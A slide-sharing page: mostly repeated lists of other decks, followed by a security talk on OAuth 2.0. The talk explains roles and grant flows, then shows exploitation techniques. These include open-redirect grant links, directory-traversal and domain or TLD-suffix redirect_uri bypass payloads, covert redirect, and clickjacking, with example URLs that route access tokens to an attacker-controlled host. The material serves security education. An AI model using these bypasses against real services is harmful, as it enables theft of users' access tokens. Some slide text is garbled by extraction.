Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
91mobiles
 
Connector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a buttonConnector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a button
DianaGray10
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
Alison B. Lowndes
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
UiPathCommunity
 
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Thierry Lestable
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Ramesh Iyer
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance
 
Generating a custom Ruby SDK for your web service or Rails API using Smithy
Generating a custom Ruby SDK for your web service or Rails API using SmithyGenerating a custom Ruby SDK for your web service or Rails API using Smithy
Generating a custom Ruby SDK for your web service or Rails API using Smithy
g2nightmarescribd
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Inflectra
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
Jemma Hussein Allen
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
BookNet Canada
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
RTTS
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
Kari Kakkonen
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Albert Hoitingh
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
Product School
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
ControlCase
 

Recently uploaded (20)

Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
 
FIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdfFIDO Alliance Osaka Seminar: Overview.pdf
FIDO Alliance Osaka Seminar: Overview.pdf
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
 
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
Kubernetes & AI - Beauty and the Beast !?! @KCD Istanbul 2024
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
 
Connector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a buttonConnector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a button
 
Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........Bits & Pixels using AI for Good.........
Bits & Pixels using AI for Good.........
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
 
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
Empowering NextGen Mobility via Large Action Model Infrastructure (LAMI): pav...
 
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
Builder.ai Founder Sachin Dev Duggal's Strategic Approach to Create an Innova...
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
 
Generating a custom Ruby SDK for your web service or Rails API using Smithy
Generating a custom Ruby SDK for your web service or Rails API using SmithyGenerating a custom Ruby SDK for your web service or Rails API using Smithy
Generating a custom Ruby SDK for your web service or Rails API using Smithy
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
 
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...Transcript: Selling digital books in 2024: Insights from industry leaders - T...
Transcript: Selling digital books in 2024: Insights from industry leaders - T...
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
 
DevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA ConnectDevOps and Testing slides at DASA Connect
DevOps and Testing slides at DASA Connect
 
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
Encryption in Microsoft 365 - ExpertsLive Netherlands 2024
 
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
From Daily Decisions to Bottom Line: Connecting Product Work to Revenue by VP...
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
 

OAuth 2.0

  • 1. Click to edit Master title style 1 $whoami 1 MIHIR SHAH | SHAHENSHAH GitHub: www.github.com/shahenshah99
  • 2. Click to edit Master title style 2 OAuth 2.0 Authorization protocol
  • 3. Click to edit Master title style 3 Agenda for today • Introduction to the OAuth 2.0 model • Receiving grants • Exploiting OAuth 2.0
  • 4. Click to edit Master title style 4 Oauth 2.0 roles 4
  • 5. Click to edit Master title style 5 Resource owner The resource owner is simply the user that is interested in granting a registered OAuth application to access their account. The extent to which the user data can be accessed is defined by scope. Different scope results in different kinds of OAuth 2.0 permission dialogs. 5
  • 6. Click to edit Master title style 6 Client In layman's terms, a client is simply an application registered to the provider (say Facebook/Google+) and is used by the third party (say Adobe) to access or manipulate a user's or resource owner's data . This concludes that a client is merely an application which allows the third party to request on behalf of the resource owner to the OAuth provider. 6
  • 7. Click to edit Master title style 7 Authorization server An authorization server is capable of granting or denying a client an access token. The authorization server authenticates the resource and, generally through various interactions, issues an access token to the client if everything goes well. A resource server and authorization server are closely knit and when in the same web application, often referred to as an OAuth API. 7
  • 8. Click to edit Master title style 8 Application The application or client must be registered on the OAuth provider's website. Once the registration is done, an application is assigned a unique identifier called the client ID 8
  • 9. Click to edit Master title style 9 Redirect URI Every application must redirect to a pre - determined URI once the OAuth flow is complete. By default, the authorization server rejects redirect-URI mismatches between application configuration and the actual one provided. The redirect URI is a crucial component of the OAuth flow, and hijacking this can result in nasty outcomes, which we'll see in upcoming sections of this chapter. 9
  • 10. Click to edit Master title style 10 Access Tokens An access token is a secret token allotted to the application and is tied to a particular user with specific permissions. The resource server expects an access token every time a request is made to it. 10
  • 11. Click to edit Master title style 11 Client ID The client ID is a unique identifier that is returned when the application is registered successfully. It is not secret information and is crucial in the working of Oauth applications. Different Oauth implementations refer to the client ID differently, for example, Application ID. 11 Client ID provided by Facebook for a dummy Oauth application
  • 12. Click to edit Master title style 12 Client Secret Client secret is a unique token generated during the registration process and is tied to the client ID. As the name suggests, a client secret is private information and shouldn't be exposed. It is used internally while generating access tokens 12
  • 13. Click to edit Master title style 13 Receiving Grants OAuth 2.0 basically allows a third party website to access a limited or selective set of user information on a particular website. There are different kinds of authorization flows, two common ones of which are as follows: • Authorization grant • Implicit grant 13
  • 14. Click to edit Master title style 14 Authorization Grants h t t p s : / / w w w. e x a m p l e . c o m / o a u t h / a u t h o r i z e ? r e s p o n s e _ t y p e = c o d e & c l i e n t _ i d = C L I E N T _ I D & r e d i r e c t _ u r i = C A L L B A C K _ U R L & s c o p e = r e a d 14 Let's break down the different components here: • response_type: When set to code, the OAuth authorization server expects the grant to be of authorization grant type. • client_id: This is the client ID/app ID of the application. • redirect_uri: This contains a URL in percent-encoded form, and after the initial flow is complete, the authorization server redirects the flow to the specified URL. • scope: This refers to the level of access needed; this is implementation specific and varies.
  • 15. Click to edit Master title style 15 Following link for example https://www.example.com/oauth/authorize?client_id=2190698099&redire ct_uri=https%3A%2F%2Ffacebook.com%2Fredirect&response_type=co de&scope=read As soon as the user allows the permission, the page redirects to the following: https://facebook.com/redirect?code=af8SFAdas Here, we see the code parameter, which contains the authorization grant code generated by the authorization server. Now this can be exchanged for an access token; this is generally done server side and a client secret must be involved. Access Token = Auth Code + Client ID + Client Secret + Redirect URI 15
  • 16. Click to edit Master title style 16 https://www.example.com/ /oauth/token?client_id=2190698099&client_ secret=adb12hge&grant_type=authorization_code&code=af8SFAdas&r edirect_uri= https%3A%2F%2Ffacebook.com%2Ftoken Now the token is returned to https://facebook.com/token in JSON format, such as the following: { "access_token":" EAACEdEose0cBAE3vD" } 16
  • 17. Click to edit Master title style 17 Implicit Grants The i m pli c i t gra nt i s a c o m m o n wa y to a c c es s to kens i n web a nd mobi le appli cati ons. Thi s gra nt do es n't requi re a n endpo i nt o n the c li ent to c a ll s upply - a utho ri za ti on c o de a nd c li ent s ec ret to then rec ei ve the a c c es s to ken. The i m pli c i t gra nt li nk lo o ks li ke the fo llo wi ng: https :/ / www.ex a mple.co m /o auth/ autho ri ze?res pons e_ type= to ken&c li ent_ i d= CL IEN T_ ID&redi rect_ uri = CALLB ACK_URL &sc ope=rea d,wri te If the a utho ri za ti on i s c o m pleted s uc c es s fully then, https :/ / fa cebo o k.c om /token# access_to ken=EAACEdEo se0cBAE3vD So n o w the third party can co m m u n icate with the reso u rce server usin g the fo llo win g to ken . 17
  • 18. Click to edit Master title style 18 EXPLOITING OAuth 2.0 18 Open redirect – the malformed URL Our exploit page is located at -> http://exploit.example.com/ we consider a trusted website to be -> http://trusted.com Directly giving the exploit link to the users won’t work but then sending a redirect from trusted.com might work, because the users trust that website. If the trusted.com site has an Oauth server running, then all you have to do is register at over there and get a client ID, set the redirect Uri as our exploit page -> exploit.example.com https://api.trusted.com/oauth2/authorization?response_ type=code&client_id=75e7i92lbwy4p4&scope=read&redirect_ uri=https%3A%2F%2Fexploit.example.com/
  • 19. Click to edit Master title style 1919 Open redirect – the malformed URL Different providers have their own implementations of OAuth 2.0, this gives way to a scenario in which a malformed grant link (non-existent or garbage values for scope, client_id and so on) results in the server redirecting the user to the redirect_uri parameter which we set earlier, that is, the exploit page. Malformed value in scope: https://api.trusted.com/oauth2/authorization?response_ type=code&client_id=75e7i92lbwy4p4&scope=blahblahblah&re direct_uri=http://exploit.example.com/ Malformed value in client_id: https://api.trusted.com/oauth2/authorization?response_ type=code&client_id=idontexistbro&scope=read&redirect_uri= http://exploit.example.com/
  • 20. Click to edit Master title style 20 Response: http://exploit.example.com/?error=invalid_scope&error_d escription=The+scope+of+%22blahblahblah%22+is+unknown %2E+Please+check+that+it%27s+property+spelled+and+a+va lid+value%2E#! But regardless of the error params, the page is still redirected. This is the beauty of this attack. This may not always work, it varies from implementation to implementation. The correct way to address this thing on the provider side is to show an error message on the provider domain (authorization server) itself rather than redirecting. This flaw was present in LinkedIn until last year.
  • 21. Click to edit Master title style 21 Hijacking the OAuth flow – fiddling with redirect URI the inherent risks involved in using redirect_uri in a grant situation where it can be made to redirect to a different location than the one allowed, thereby hijacking the access tokens. The application is set to allow only redirect_uri = http://example.com/token/callback. Then we can use certain tricks to circumvent the checks and hijack the tokens to our (hijacker's) domain or file.
  • 22. Click to edit Master title style 22 Directory traversal tricks Directory traversal tricks assume that we can save certain files of our choice under the allowed domain; this case is common in web applications which allow uploading of files The following are the URLs which can effectively bypass the validation if traversals are not considered: http://example.com/token/callback/../../our/path http://example.com/token/callback/.%0a./.%0d./our/path http://example.com/token/callback/%252e%252e/%252e%252e/our/path /our/path///../../http://example.com/token/callback/ http://example.com/token/callback/%2e%2e/%2e%2e/our/path
  • 23. Click to edit Master title style 23 Domain tricks As mentioned earlier, if the allowed redirect_uri is http://example.com/token/callback , we use the following two set tricks related to domains.
  • 24. Click to edit Master title style 24 Naked Domain This means the correct redirect_uri is a naked domain, that is, the subdomain is not specified. Some implementations allow subdomains when there is a case of naked domain. One such flaw was discovered in Facebook, which had one of its Oauth applications misconfigured in the MailChimp service. Example of bypasses if naked domain is specified: https://controlledsubdomain.example.com/token/call back https://www1.example.com/token/callback https://files.example.com/token/callback
  • 25. Click to edit Master title style 25 TLD Suffix confusion We can bypass certain checks if a suitable top -level domain is specified. We can bypass the redirect_uri with a .com TLD by replacing it with a suffix such as .com.mx .com.br. Examples : Original Suffixed http://example.com/token/callback http://example.com.mx/token/callback http://example.org/token/callback http://example.org.in/token/callback The basic idea here is to just leave the domain asis so that the authorization servers validate it and append a valid suffixed TLD to bypass the check. This issue has been discovered in the OAuth implementation of Instagram and Slack. • Slack: https://hackerone.com/reports/2575
  • 26. Click to edit Master title style 26 Flow hijack through open redirect on client Sometimes it's easy to find an open redirect on the client website (third party) and/or its subdomains which is allowed in the application configuration. We can exploit this in an implicit grant scenario where access tokens will be redirected to the attacker's domain through a 302 redirect. Redirect:http://www.example.com/exit/redirect.php?u=http:// w ww.google.com Exploit:redirect_uri=http ://www.example.com/exit/redirect.php ?u=http://exploit.com/token/callback The access tokens will now be passed to exploit.com/token/callback. This technique is widely known, and generally dubbed, as Covert Redirect.
  • 27. Click to edit Master title style 27 Force a malicious app installation F o o l i n g t h e u s e r t o c l i c k o n t h e a l l o w b u t t o n w i t h o u t t h e m u n d e r s t a n d i n g i t . T h e r e b y g r a n t i n g u s a l l t h e p e r m i s s i o n s – c l i c k j a c k i n g . T h e o n l y i s s u e t h a t m i g h t b e f a c e d i s : T h e p a g e s h o u l d a l l o w X - F R A M E - O P T I O N S h e a d e r. i . e . t h e p a g e s h o u l d b e f r e e o f a n y f r a m e - b u s t i n g c o d e . Credits: http://www.bubblecode.net
  • 28. Click to edit Master title style 2828 Links for more study on Oauth 2.0 https://techzone.ergon.ch/oauth-307Redirect-idpMixUp/ http://www.oauthsecurity.com/ http://homakov.blogspot.com/ http://isciurus.blogspot.com/ http://bubblecode.net/
  • 29. Click to edit Master title style 29 Thank You